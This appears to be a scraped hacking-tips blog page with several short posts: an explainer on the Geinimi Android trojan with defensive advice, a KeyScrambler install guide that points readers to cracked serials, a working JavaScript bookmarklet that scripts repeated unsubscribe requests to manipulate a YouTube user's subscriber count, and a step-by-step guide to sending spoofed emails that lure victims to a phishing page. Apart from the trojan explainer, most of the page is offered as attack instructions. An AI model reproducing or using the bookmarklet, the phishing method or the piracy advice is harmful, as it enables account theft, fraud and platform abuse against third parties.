0 Comments
Posted in Arrangement, Art, Business

Ways of Working and What is Trojan Android


First, how this trojan could be in our phones?
The answer is because the lack of attention to activities related to the Internet. Example in terms of download games or applications.
Then, what was wrong with the game or an application that we have downloaded?
Because the manufacturer Geinimi ‘package’ repeated legal Android applications (especially games) with Trojan Geinimi. Packaging Applications with Android Geinimi Trojan is then redistributed to the sites.
This is how the operations are performed when Geinimi successfully infect your Android phone:
* Send your Android device coordinates
* Send an apparatus Identity (IMEI) and the identity of the SIM card (IMSI)
* Download and ask users to install an application
* Ask the user for a number of applications to remove
* Registration and details of programs installed on a remote server
So, what solutions or suggestions on how to avoid Geinimi Trojan?
* Download the application only from a trusted application store. Earlier Check the name of the application developers and product reviews.
* Check the permissions to request an application. Make sure that the requested access rights in accordance with the above functions.
* Note the “code” your Android phone. The phone is infected with malware is usually funny as menelpun act or automatically via SMS to recipients who are not familiar and mysterious application that is installed without your knowledge.
* If your phone is found to behave erratically, it is advisable to install security applications on your phone to check.
Be very careful friends ^ ^
0 Comments
Posted in Arrangement, Art, Business

How To Activate Timeline In Facebook Before others Get It

0 Comments
Posted in Arrangement, Art, Business

Keyscrambler to protect You

I have earlier posted about how to hack anyone's email account with keyloggers.When you study an attack method then you have to study the defense attack for that.There is a chance for yourself getting attacked.In this post I will show you how to protect yourself.
KeyScrambler can display a small overlay window on top of your browser screen that verifies that your keystrokes are being encrypted. The program is very easy to use and protects you automatically whenever you launch your browser. KeyScrambler Personal only works with Internet Explorer, Firefox and Flock, there are optional Pro versions available that offer support for additional browsers and other applications.
Anti keylogger protection for your browser
 1. Download Keyscrambler software

2. Run "KeyScramblerPro_Setup.exe" file on your computer and complete installation. Restart your computer to allow Keyscrambler to start its working.

3. On restart, Keyscrambler will ask for Registration information. Read "Top Sites to Find All The Serials You Need" or "How To Get Cracks and Serials to Any Program using Craagle" to find a serial number for Keyscrambler, enter information and hit "Verify".You have those articles on the site itself.
4. Thats it. Now, Keyscrambler application will start encrypting your typed keystrokes on your computer thus, protecting you from invisible keyloggers. To check its working, simply go to say www.gmail.com and enter will email id-password. You will see Overlay Window at top left showing the encrypted value of your typed keystrokes.

What's more, KeyScrambler provides protection without getting in your way. You don't have anything to learn about the program and you don't have to do anything differently, but with KeyScrambler your important personal information will be a whole lot safer.
0 Comments
Posted in Arrangement, Art, Business

Lower Someones Subscription Count

YouTube is the largest video-sharing website on which users can upload, share, and view videos. When you subscribe to someone, you are constantly updated on which of your favorites (the people you subscribe to) has uploaded a new video. That way, you don't have to constantly search for their username, you just have a convenient list of the tubers you like the best. But there are users that are paying for great promotion on their videos on YouTube, and they are getting a lot of subscriber, which in fact they don't deserve to have it. So here i will show you how to lower someone's subscription count on YouTube. It's very simple method, but totally worth it.
LETS START
  1. You have to subscribe to them. Next, enter this code into the address bar:                                           javascript:function unsubscribe() { httpreq=new XMLHttpRequest(); httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false); httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC')); if(!httpreq.responseXML) { setTimeout('unsubscribe()', timeout); return; } if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') { alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue); } else if((window.status=++count)!=times) { setTimeout('unsubscribe()', timeout); } else { alert('DUN'); } } count=0; if((username=prompt('enter target\'s username', 'Fred'))!=null) { if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) { if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) { unsubscribe(); } } } void(0);
 That's it.
BE HAPPY :)



0 Comments
Posted in Arrangement, Art, Business

Fake Emailer :- Send fake emails

Phishing is one of the most useful and simple methods for hacking email accounts. When using phishing you need to send an email to your victim that contains the link to your phisher page. The victim will click on this link only if he finds the mail genuine, so we need a fake mailer to make this mail appear genuine.

In this post i will show you how to send anonymous email to your victim using Fake Mailer.

1. Go to Fake Mailer website to send anonymous email.



2. Now, enter the information as shown:

From Name: The Sender name which will appear on Email
From Email: The sender Email address
To: Victim email address
Subject: Subject of the Email
Content-type: Select text/html
Text: The content of your mail. Put something which will make your victim to click on your phisher link.

3. Now, enter captcha and hit on Send.

4. Your victim will receive mail like this:



This Fake Mailer is pretty easy to use and also very handy to send anonymous email to your friend or victim.